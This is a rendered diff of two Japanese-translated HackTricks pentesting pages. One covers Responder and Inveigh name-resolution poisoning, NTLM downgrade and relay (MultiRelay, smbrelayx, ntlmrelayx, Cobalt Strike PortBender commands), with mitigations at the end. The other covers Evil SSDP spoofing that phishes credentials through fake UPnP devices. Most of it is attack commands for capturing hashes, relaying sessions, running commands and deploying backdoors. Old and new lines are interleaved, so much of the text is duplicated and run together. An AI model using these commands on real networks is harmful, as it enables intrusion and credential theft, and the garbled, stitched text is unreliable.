* 追加のデータがコンソールに表示されるため、`-v` フラグを使用して冗長性を増やします。
* `-F``-P` などのオプションを使用して NTLM または Basic 認証を強制したり、プロキシ認証を強制したりすることができますが、ログインプロンプトが表示される可能性があるため、慎重に使用する必要があります。
* `-w` フラグは組み込みの WPAD プロキシサーバーを利用します。これは特に大規模な組織では非常に効果的であり、Internet Explorer を起動するユーザーが [Auto-detect settings](https://docs.microsoft.com/en-us/internet-explorer/ie11-deploy-guide/auto-detect-settings-for-ie11) を有効にしている場合、すべてのユーザーの HTTP リクエストをキャプチャします。
</details>
#### Responder の実行
Responder のデフォルト動作を実行するには、次のコマンドを実行するだけです。
```bash
responder -I <Iface> #Default conf
responder -I <Iface> -P -r -v #More chances but might break things
```
**日本語訳:**
興味深いテクニックは、可能な限りResponderを使用してNTLM認証をダウングレードすることです。これにより、**NTLMv2ではなく** **簡単にクラックできる**NTLMv1のチャレンジとレスポンスを**キャプチャ**できます[**このガイドに従って**](../../windows-hardening/ntlm/#ntlmv1-attack)**。**
```bash
#Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"
responder -I <Iface> --lm --disable-ess #Downgrade NTLM authntication if possible and force ESS downgrade
```
デフォルトでは、**WPADの偽装は実行されません**が、次のように実行できます:
```bash
responder -I <Iface> --wpad
```
あなたのIPでNetBIOSリクエストを解決することもできます。そして、認証プロキシを作成します
```bash
responder.py -I <interface> -Pv
```
NTLMハッシュを傍受することはできません通常、しかし、例えば`--format=netntlmv2`オプションを使用して**NTLMチャレンジとレスポンス**を簡単に取得し、**クラック**することができます。
デフォルトの_**Responder**_インストールの**ログとチャレンジ**は、kaliの`/usr/share/responder/logs`にあります。
#### Responder - DHCPポイズニング
WindowsはNetBIOS、WINS、WPAD設定などのカスタムDHCPオプションを複数使用します。ワークステーションがネットワーク設定を取得するためにDHCPリクエストを送信するとき、これらの追加設定はDHCP応答に含まれ、簡単な接続と名前解決を容易にします。
DHCP応答をスプーフィングしても、ワークステーションのネットワーク構成に干渉するため、中断なしで行うことは難しい場合があります。通常、ターゲットサブネットワークのDNSサーバー、スイッチ、ルーティングテーブル、ドメイン、ネットマスク、DHCPサーバーなどについて非常に良い知識が必要です。**これらの設定に誤りがあると、ネットワークに中断が発生します。**
ただし、DHCP応答をスプーフィングすることには独自の利点があります。ARPポイズニングよりも**確実にステルス**です。ユニキャスト応答1つで被害者のルーティング情報を永久にポイズンすることができ、ネットワーク上で複数のDHCPサーバーが動作していることも一般的です。ユニキャストDHCP応答は検出がより複雑です。一部のスイッチはDHCPスヌーピングを防ぐためのセキュリティ設定を提供しますが、これらの設定は直感的ではなく、有効になっているときにしばしば誤って構成されています。
> この攻撃は非常に効果的で、確実にNTLMv1/2ハッシュを取得できます。
```bash
./Responder.py -I eth0 -Pdv
```
#### Responder - 資格情報のキャプチャ
Responderは、**言及されたプロトコルを使用してすべてのサービスを偽装**します。これらのプロトコルを使用して解決されたサービスにアクセスしようとするユーザーがいると、**彼はResponderに対して認証を試み**、Responderはおそらく**NTLMv2チャレンジ/レスポンス**を"キャプチャ"できます。
NetNTLMv1にダウングレードしたり、ESSを無効にしたりすることも可能です。
![](<../../.gitbook/assets/poison (1) (1) (1).jpg>)
### Inveigh - C#/PowerShell Responder
> Inveighは、Windowsシステムに制限されているペネトレーションテスター/レッドチーマーを支援するために設計されたPowerShell ADIDNS/LLMNR/NBNS/mDNS/DNSスプーファーおよび中間者ツールです。
[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh)は、PowerShellスクリプトでしたが、現在は同じ主要機能を持つC#バイナリです。[**パラメータ**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters)をリストアップし、使用方法の指示を示す[**wiki**]があります。\
別のバージョンは[**InveighZero**](https://github.com/Kevin-Robertson/InveighZero)で見つけることができます。
![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png)
または、さらに多くのオプションを使用して実行します:
InveighはPowerShellを介して操作できます
```powershell
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
```
または、C#バージョンを実行します:
または、C# バイナリとして実行されます:
```bash
Inveigh.exe
```
## NTLM Relay Attack
### NTLM Relay Attack
この攻撃は、内部ネットワーク上の**ターゲットマシン**に**SMB認証セッション**を中継します。認証**セッションが成功する**と、自動的に**システム**の**シェル**に移行します。中継される認証は、中継されるホストに**ローカル管理者アクセス権を持つユーザー**からである必要があり、かつ**SMB署名が無効になっている**必要があります。
この攻撃は、SMB認証セッションを利用してターゲットマシンにアクセスし、成功するとシステムシェルを取得します。主な前提条件は次のとおりです
- 認証ユーザーは、中継ホストでのローカル管理者アクセス権を持っている必要があります。
- SMB署名が無効になっている必要があります。
### 445の転送とトンネリング
#### 445ポートのフォワーディングとトンネリング
{% hint style="warning" %}
もしネットワーク内に**マシンを導入できる**場合、以下のセクションの**ツール**のいずれかを使用して中継攻撃を実行することができ、これについて心配する必要はありません。
{% endhint %}
直接ネットワーク導入が困難なシナリオでは、ポート445のトラフィックをフォワーディングおよびトンネリングする必要があります。[**PortBender**](https://github.com/praetorian-inc/PortBender)のようなツールは、ポート445のトラフィックを別のポートにリダイレクトするのに役立ちます。これは、ローカル管理者アクセス権がドライバーのロードに利用可能な場合に重要です。
ただし、レッドチームでは、Windowsマシンのポート445のトラフィックを自分のマシンに**転送する必要がある**場合があります。その際は、以下のツールを実行して、そのツールのトラフィックを**プロキシを介して中継して**内部の攻撃対象マシンに到達させる必要があります。
ツール[**PortBender**](https://github.com/praetorian-inc/PortBender)は、ポート**445に向かうトラフィックを別のポート**たとえば8445に**リダイレクト**するドライバです。ドライバをロードするには**ローカル管理者アクセス権**が必要です。ほとんどのWindowsドライバが配置される場所である`cd C:\Windows\System32\drivers`を使用するのが適切です。
Cobalt StrikeでのPortBenderのセットアップと操作
```bash
Cobalt Strike -> Script Manager -> Load (Select from the filesystem PortBender.cna)
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Go to drivers dir
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Forward traffic to 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Send traffic to port 8445 to Team Server
beacon> socks 1080 # Socks proxy in port 1080 to attack host in the internal network from the Team Server
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# To kill
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
```
### Metasploit
### NTLM Relay Attack用のその他のツール
- **Metasploit**: プロキシ、ローカルおよびリモートホストの詳細を設定します。
- **smbrelayx**: SMBセッションを中継し、コマンドを実行したりバックドアを展開するためのPythonスクリプトです。
- **MultiRelay**: 特定のユーザーまたはすべてのユーザーを中継し、コマンドを実行したりハッシュをダンプするためのResponderスイートからのツールです。
必要に応じて各ツールはSOCKSプロキシを介して操作できるように構成でき、間接的なネットワークアクセスでも攻撃を可能にします。
### MultiRelayの操作
MultiRelayは _**/usr/share/responder/tools**_ ディレクトリから実行され、特定のIPアドレスまたはユーザーを対象とします。
```bash
setg Proxies socks4:127.0.0.1:1080 # Use this if you need to route the traffic to reach the attacked ip
set SRVHOST <local_ip>
set SRVPORT 445
set SMBHOST <ip_to_auth_to>
run -j
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
```
### smbrelayx
```bash
python3 smbrelayx.py -t smb://<ip_to_attack> -smb2support --no-http-server --no-wcf-server
# By default it will just dump hashes
# To execute a command use: -c "ipconfig"
# To execute a backdoor use: -e "/path/to/backdoor
### NTLMリレーアタックを実行するための包括的なセットを形成するこれらのツールと技術。
# Attack through socks proxy
proxychains python3 ntlmrelayx.py -t smb://<ip_to_attack> -smb2support --no-http-server --no-wcf-server
```
### MultiRelay
### NTLMログインを強制する
**MultiRelay**を使用したい場合は、_**/usr/share/responder/tools**_に移動し、MultiRelay (`-t <IP target> -u <User>`)を実行します:
```bash
python MultiRelay.py -t <IP target> -u ALL # If "ALL" then all users are relayed
# By default a shell is returned
python MultiRelay.py -t <IP target> -u ALL -c whoami #-c to execute command
python MultiRelay.py -t <IP target> -u ALL -d #-d to dump hashes
# Use proxychains if you need to route the traffic to reach the attacked ip
```
![](<../../.gitbook/assets/image (209).png>)
### NTLMログインの強制
Windowsでは、**特権のあるアカウントを任意のマシンに認証させることができる場合があります**。詳細については、以下のページを参照してください:
Windowsでは、**特権アカウントの一部を任意のマシンに認証させることができる場合があります**。次のページを読んで詳細を学んでください:
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
{% endcontent-ref %}
## 解決策
### LLMNRの無効化
DNSクライアントのLLMNRを無効にするには、gpedit.mscを開きます。\
コンピューター構成->管理用テンプレート->ネットワーク->DNSクライアントに移動します。\
オプション「マルチキャスト名解決を無効にする」を見つけ、「ポリシー設定」をクリックします:
![](../../.gitbook/assets/1.jpg)
新しいウィンドウが開いたら、このオプションを有効にし、適用を押してOKをクリックします
![](../../.gitbook/assets/2.jpg)
### NBT-NSの無効化
NBT-NSを無効にするオプションの1つは、DHCPスコープオプションを使用することです。
MicrosoftのDHCPサーバーを使用している場合は、NBT-NSを無効にしたいスコープを選択します。 「スコープオプション」を右クリックし、「オプションの構成」をクリックします。以下の例では、NBT-NSを無効にしたいDHCPスコープは192.168.1.100です。
![](../../.gitbook/assets/3.jpg)
スコープオプションウィンドウで、詳細タブに移動し、ドロップダウンメニューを「Microsoft Windows 2000 Options」に変更します
![](../../.gitbook/assets/4.jpg)
リストから「001 Microsoft Disable Netbios Option」を選択し、その値を「0x2」に変更し、適用してからOKをクリックします
![](../../.gitbook/assets/5.jpg)
### WPAD
WPAD攻撃に対抗するために、DNSゾーンに「wpad」のエントリを追加できます。 DNSエントリは有効なWPADサーバーを指す必要はありません。クエリが解決されている限り、攻撃は防止されます。
### マルチリレー
1\. **すべてのローカルWindowsマシンでSMB署名を強制する**。この設定により、すべてのSMBセッションにデジタル署名が付けられ、クライアントとサーバーはパケットの送信元を確認してから継続する必要があります。この設定はデフォルトでドメインコントローラーにのみ有効です。Microsoftの以下の記事では、これらの設定グループポリシーを介して有効にできるとその実装方法について詳しく説明しています。
[https://blogs.technet.microsoft.com/josebda/2010/12/01/the-basics-of-smb-signing-covering-both-smb1-and-smb2/](https://blogs.technet.microsoft.com/josebda/2010/12/01/the-basics-of-smb-signing-covering-both-smb1-and-smb2/)
[https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/microsoft-network-client-digitally-sign-communications-always](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/microsoft-network-client-digitally-sign-communications-always)
2\. **ローカルネットワーク上のユーザーが必要なマシンにのみリモートログインできるように確認する**。例SallyはSallyのワークステーションにのみログインできます。 SallyのSMB認証セッションを攻撃者が傍受した場合、このセッションを他のワークステーションに中継することはできず、この方法は無効になります。
3\. **ローカルネットワーク上でNTLM認証を可能な限り制限する**。この攻撃はKerberos認証を利用できないため、発生しているNTLMの量を制限することで、この攻撃を大幅に阻止できます。Microsoftにはこれを実現する情報がありますが、注意してください。Kerberos認証が何らかの理由で失敗すると、通常はNTLMにフォールバックします。完全に無効にすると、ネットワークが停止する可能性があります。
4\. **ネットワーク上の不正なユーザーを防止する**。インサイダーの脅威はおそらくSMBリレー攻撃を利用しないでしょう。ネットワークの物理的セキュリティポリシーを強化し、ACLとMACフィルタリングでネットワーク上の不正なデバイスを防止し、適切なネットワークセグメンテーションを確保することで、この攻撃が行われる可能性を大幅に制限できます。
## 参考文献
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
* [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)
* [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
* [**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)
* **画像提供元:**\
[https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)\
[https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)\
[https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)\
[https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
<details>
@ -298,10 +134,10 @@ WPAD攻撃に対抗するために、DNSゾーンに「wpad」のエントリを
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksッズ**](https://peass.creator-spring.com)を入手してください
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけます
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローしてください
* **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

263
generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md
View file

@ -2,263 +2,40 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのスワッグ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出**してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを入手してください
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
</details>
**この記事は** [**https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/**](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/) **からコピーされました**
**詳細については、[https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/)をチェックしてください。**
## **はじめに**
## **SSDPUPnP概要**
### **SSDPとは何ですか**
SSDPSimple Service Discovery Protocolは、UDPポート1900で動作し、DHCPやDNSの設定を必要とせずにネットワークサービスの広告と検出に使用されます。これはUPnPUniversal Plug and Playアーキテクチャで基本的であり、PC、プリンタ、モバイルデバイスなどのネットワークデバイス間のシームレスなやり取りを容易にします。UPnPのゼロ構成ネットワーキングは、デバイスの検出、IPアドレスの割り当て、およびサービスの広告をサポートします。
SSDPまたはSimple Service Discovery Protocolは、**ネットワークサービスの広告と検出**のために設計されたネットワークプロトコルです。DHCPやDNSの設定なしで動作することができます。これは、住宅や小規模オフィス環境で使用するために設計されました。UDPを基にしたトランスポートプロトコルである**ポート1900**を使用します。HTTPメソッドのNOTIFYを使用して、マルチキャストグループに対してサービスの確立または撤回をアナウンスします。これは、UPnPの検出プロトコルの基礎です。
## **UPnPフロー構造**
### **UPnPデバイスとは何ですか**
UPnPアーキテクチャには、アドレッシング、検出、説明、制御、イベント、プレゼンテーションの6つのレイヤーが含まれます。最初に、デバイスはIPアドレスを取得するか自己割り当てを試みますAutoIP。検出フェーズにはSSDPが関与し、デバイスはアクティブにM-SEARCHリクエストを送信したり、サービスをアナウンスするためにパッシブにNOTIFYメッセージをブロードキャストします。クライアントデバイス間の重要な相互作用に不可欠な制御レイヤーは、XMLファイル内のデバイスの説明に基づいてコマンドを実行するためにSOAPメッセージを利用します。
UPnPまたはUniversal Plug and Playは、**ネットワーキングプロトコルのセット**であり、パーソナルコンピュータ、プリンタ、インターネットゲートウェイ、Wi-Fiアクセスポイント、モバイルデバイスなどのネットワークデバイスが**ネットワーク上での相互の利用可能性を検出**し、通信、データ共有、エンターテイメントのためのネットワークサービスを確立することを可能にします。UPnPアーキテクチャはゼロ構成ネットワーキングをサポートしています。任意のベンダーのUPnP対応デバイスは、ネットワークに動的に参加し、IPアドレスを取得し、要求に応じて名前をアナウンスしたり、機能を広告したり、他のデバイスの存在と機能について学習することができます。
## **IGDツール概要**
### **フロー**
IGDInternet Gateway Deviceは、標準のWANインターフェース制限にもかかわらず、NATセットアップで一時的なポートマッピングを可能にし、オープンなSOAPコントロールポイントを介してコマンドを受け入れることを許可します。**Miranda**のようなツールはUPnPサービスの検出とコマンドの実行を支援します。**Umap**はWANアクセス可能なUPnPコマンドを公開し、**upnp-arsenal**のようなリポジトリはさまざまなUPnPツールを提供します。**Evil SSDP**は、スプーフィングされたUPnPデバイスを介したフィッシングに特化し、合法的なサービスを模倣するためのテンプレートをホスティングします。
**UPnP**スタックは、アドレッシング、検出、説明、制御、イベント、プレゼンテーションの**6つのレイヤー**で構成されています。
## **Evil SSDPの実用的な使用法**
アドレッシングレイヤーでは、UPnP対応システムは**DHCP**を介してIPアドレスを取得しようとします。それが不可能な場合、169.254.0.0/16範囲RFC 3927からアドレスを**自動割り当て**するプロセスであるAutoIPを使用します。
次は検出レイヤーで、システムは**Simple Service Discovery Protocol**SSDPを使用してネットワーク上の他のデバイスを検索します。デバイスを検出する方法は**アクティブ**と**パッシブ**の2つあります。アクティブな方法を使用する場合、UPnP対応デバイスはマルチキャストアドレス**239.255.255.250のUDPポート1900**に対して検出メッセージ(**M-SEARCHリクエスト**と呼ばれる)を**送信**します。これをHTTPUUDP上のHTTPと呼びます。なぜなら、HTTPヘッダに似たヘッダが含まれているからです。M-SEARCHリクエストは次のようになります
```
M-SEARCH * HTTP/1.1
ST: ssdp:all
MX: 5
MAN: ssdp:discover
HOST: 239.255.255.250:1900
```
UPnPシステムは、このリクエストを受け取ると、デバイスがサポートするサービスをリストした説明XMLファイルのHTTPの場所をアナウンスする**UDPユニキャストメッセージ**で応答することが期待されています。
デバイスの発見には**パッシブな方法**を使用する場合、UPnP対応デバイスは定期的にネットワーク上でサービスをアナウンスするため、UDPポート1900のマルチキャストアドレス239.255.255.250に**NOTIFYメッセージを送信**します。以下は、アクティブなディスカバリに対する応答として送信されるメッセージの例です。
```
NOTIFY * HTTP/1.1\r\n
HOST: 239.255.255.250:1900\r\n
CACHE-CONTROL: max-age=60\r\n
LOCATION: http://192.168.10.254:5000/rootDesc.xml\r\n
SERVER: OpenWRT/18.06-SNAPSHOT UPnP/1.1 MiniUPnPd/2.1\r\n
NT: urn:schemas-upnp-org:service:WANIPConnection:2
```
UPnPプロファイルの説明は、アクティブな検出中に受信した応答メッセージのLOCATIONフィールドの値、またはパッシブな検出中に受信したNOTIFYメッセージに参照されます。
**制御レイヤー**はおそらく最も**重要**なレイヤーであり、クライアントは説明ファイル内のURLを使用してUPnPデバイスにコマンドを送信することができます。これはSimple Object Access Protocol**SOAP**を使用することで行われます。SOAPはXMLをHTTP上で使用するメッセージングプロトコルです。デバイスは制御URLエンドポイントにSOAPリクエストを送信します。制御URLは説明ファイル内の\<service>タグで説明されています。\<service>タグは次のようになります:
```xml
<service>
<serviceType>urn:schemas-upnp-org:service:WANIPConnection:2</serviceType>
<serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId>
<SCPDURL>/WANIPCn.xml</SCPDURL>
<controlURL>/ctl/IPConn</controlURL>
<eventSubURL>/evt/IPConn</eventSubURL>
</service>
```
### **IGD - インターネットゲートウェイデバイス**
**IGD**は、ネットワークアドレス変換NATの設定でポートをマッピングします。IGDは、アプリケーションが一定の時間期間ユーザーが手動で何か手順を実行する必要はありませんにおいて、ルーター上に一時的なポートマッピングを動的に追加することを可能にします。
ほとんどのデバイスは通常、WANインターフェースを介してSSDPパケットを受け入れませんが、一部のデバイスはまだ開いているSOAPコントロールポイントを介してIGDコマンドを受け入れることができます。
**Umapツールセクション**では、このベクターを悪用する方法を見つけることができます。
## **ツール**
### **Miranda**
[**Miranda**](https://raw.githubusercontent.com/0x90/miranda-upnp/master/src/miranda.py)は、**python2**の**UPnPクライアント**であり、UPnPサービスを発見し、詳細を取得し、それらにコマンドを送信するのに役立つことがあります。
```
upnp> msearch
Entering discovery mode for 'upnp:rootdevice', Ctl+C to stop...
SSDP reply message from 192.168.1.254:49152
XML file is located at http://192.168.1.254:49152/wps_device.xml
Device is running Unspecified, UPnP/1.0, Unspecified
SSDP reply message from 192.168.1.254:53350
XML file is located at http://192.168.1.254:53350/37699b14/rootDesc.xml
Device is running Linux/3.4.11 UPnP/1.0 MiniUPnPd/1.9
upnp> host list
[0] 192.168.1.254:49152
[1] 192.168.1.254:53350
upnp> host get 0
upnp> host details 0
Host name: 192.168.1.254:49152
UPNP XML File: http://192.168.1.254:49152/wps_device.xml
Device information:
Device Name: WFADevice
Service Name: WFAWLANConfig
controlURL: wps_control
eventSubURL: wps_event
serviceId: urn:wifialliance-org:serviceId:WFAWLANConfig1
SCPDURL: wps_scpd.xml
fullName: urn:schemas-wifialliance-org:service:WFAWLANConfig:1
ServiceActions:
PutMessage
NewInMessage
InMessage:
dataType: bin.base64
[...]
upnp> host send 0 WFADevice WFAWLANConfig PutMessage
```
### Umap
ツール[**umap**](https://github.com/0x90/upnp-arsenal/blob/master/umap-bypass.py)は、**WAN**インターフェースから利用可能な**upnpコマンド**を**発見**するのに役立ちますこれはバグのある実装のためにこれらのインターフェースで広告されていない場合もあります。たとえば、ルーターをテストして内部ネットワークとWANインターフェースの両方からアクセスできる場合、内部ネットワークからすべてのサービスを列挙してから外部ネットワークからそれらのサービスを呼び出すことを試してみる必要がありますたとえば、**miranda**を使用します)。
### **その他のUPnPツール**
[**https://github.com/0x90/upnp-arsenal**](https://github.com/0x90/upnp-arsenal)でさらに多くのupnpツールを見つけることができます。
### **Evil SSDP**
Evil SSDPツールは[initstring](https://twitter.com/init\_string)によって開発されました。このツールはGitHubにホストされています。git cloneコマンドを使用して、gitのすべての内容を攻撃者のマシンにクローンします。git cloneコマンドはGitHubと同じ名前のディレクトリを作成します。ツールはPythonバージョン3で開発されているため、プログラムを実行するためにはpython3の後に.pyファイルの名前を使用する必要があります。ここでは、ツールの基本的なヘルプ画面が表示されています。
```bash
git clone https://github.com/initstring/evil-ssdp.git
cd evil-ssdp/ls
python3 evil-ssdp.py --help
```
![](https://i0.wp.com/1.bp.blogspot.com/-O6lddDvxqts/Xkq5PHqeE\_I/AAAAAAAAisQ/FKOCxVwT9cMy54lLy0SsYcKoM5Q95K5mQCLcBGAsYHQ/s1600/1.png?w=687\&ssl=1)
クローンされたディレクトリには、templatesという名前のディレクトリが含まれています。これには、ターゲットユーザーをフィッシングするために使用できるすべての事前コンパイルされたテンプレートが含まれています。
## **SSDPのスプーフィング**
問題なくツールを実行したので、いくつかの有用な資格情報を入手するために使用しましょう。この最初の実践では、信頼性のあるUPnPデバイスとしてスキャナーをスプーフィングします。まず、テンプレートを設定する必要があります。
### **テンプレートの設定**
ツールを使用するには、ネットワークインターフェースを指定する必要があります。ここでは、攻撃者のマシン上で「eth0」をインターフェースとして持っていますが、「ifconfig」コマンドを使用してインターフェースを見つけることができます。
インターフェースを指定した後、テンプレートディレクトリで以前に見つけたテンプレートを渡すために「--template」パラメータを使用します。スキャナーをスプーフィングするために、次のコマンドを実行します。ツールがその役割を果たし、複数のテンプレートファイルがポート8888で攻撃者のマシン上にホストされていることがわかります。また、SMBポインタもホストされています。
```bash
ls temlates/
python3 evil-ssdp.py eth0 --template scanner
```
![](https://i0.wp.com/1.bp.blogspot.com/-kg05jQ03Fnw/Xkq5Qing\_qI/AAAAAAAAisk/GYK8MuCKqKUalqh3DHGWVRoyDlAQaxUrwCLcBGAsYHQ/s1600/2.png?w=687\&ssl=1)
### **ユーザーの操作**
次の論理的なステップは、ユーザーを操作してアプリケーションをクリックさせることです。ターゲットと同じネットワークにいる場合、エクスプローラーに偽のスキャナーが表示されます。これがUPnPが機能する場所です。Evil SSDPツールは、ターゲットとの強制的な相互作用なしに、ターゲットのシステム上にこの本物のスキャナーを作成します。
![](https://i1.wp.com/1.bp.blogspot.com/-\_05xXp10Buk/Xkq5Qz4yosI/AAAAAAAAiso/HdHr0qJ59rkR2ur\_UYcrHMdf93uqMhXUwCLcBGAsYHQ/s1600/3.png?w=687\&ssl=1)
エクスプローラー内のアイコンをクリックすると、デフォルトのWebブラウザにリダイレクトされ、ホストされたリンクが開きます。ここで使用したテンプレートが活躍します。ユーザーは、自分が本物のスキャナーまたは私たちが生成した偽のUPnPデバイスに接続されていることを認識しています。無意識のターゲットは、以下の画像に示すように、このテンプレートに有効な資格情報を入力します。
![](https://i2.wp.com/1.bp.blogspot.com/-lp2DBNRl12A/Xkq5RBtGvgI/AAAAAAAAiss/G9jSOVdBO4wnRKixpXlbj6BJeCTBWz7cACLcBGAsYHQ/s1600/4.png?w=687\&ssl=1)
### **資格情報の取得**
ターゲットユーザーが資格情報を入力すると、攻撃者のマシンのターミナルをチェックして、ユーザーが入力した資格情報を確認します。各ターゲットデバイスに対して会話が必要ないため、偽のスキャナーはネットワーク内のすべてのユーザーに表示されます。これは、この種の攻撃の範囲が無限であることを意味します。
![](https://i1.wp.com/1.bp.blogspot.com/-RAI02igc4F4/Xkq5RSJ3j2I/AAAAAAAAisw/p47jd\_jyyAE3RQIpms6nd-TzsPygD4CXQCLcBGAsYHQ/s1600/5.png?w=687\&ssl=1)
